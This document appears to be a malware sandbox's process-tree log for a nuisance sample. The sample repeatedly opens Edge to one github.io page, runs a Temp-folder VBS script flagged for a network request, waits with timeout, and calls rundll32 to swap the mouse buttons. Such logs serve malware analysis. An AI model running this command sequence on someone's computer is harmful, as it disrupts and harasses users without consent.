C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:15⤵PID:5528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:15⤵PID:6044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:15⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:15⤵PID:6036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:15⤵PID:6288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:15⤵PID:6960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:15⤵PID:6584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:15⤵PID:6368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:15⤵PID:7256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:15⤵PID:7620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:15⤵PID:7996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:15⤵PID:7512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:15⤵PID:7324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7400 /prefetch:15⤵PID:7908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:15⤵PID:8540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:15⤵PID:8788
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:5456
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:5472
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:5980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:5992
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:5800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:5816
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:5700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:5740
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:6224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:6236
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:6888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:6900
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:6504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:6516
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:5708
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:6172
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:7188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:7204
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:7544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:7556
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:7932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:7944
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:7420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:7424
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:8144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:7068
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:7992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:8136
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:8404
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:8416
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:8724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:8736
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:1396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:10008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:10096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:10212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵PID:9516
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11824.vbs"3⤵
- Blocklisted process makes network request
PID:1708
-
-
C:\Windows\system32\timeout.exetimeout 603⤵
- Delays execution with timeout.exe
PID:1876
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll, SwapMouseButton3⤵PID:1880
-
-
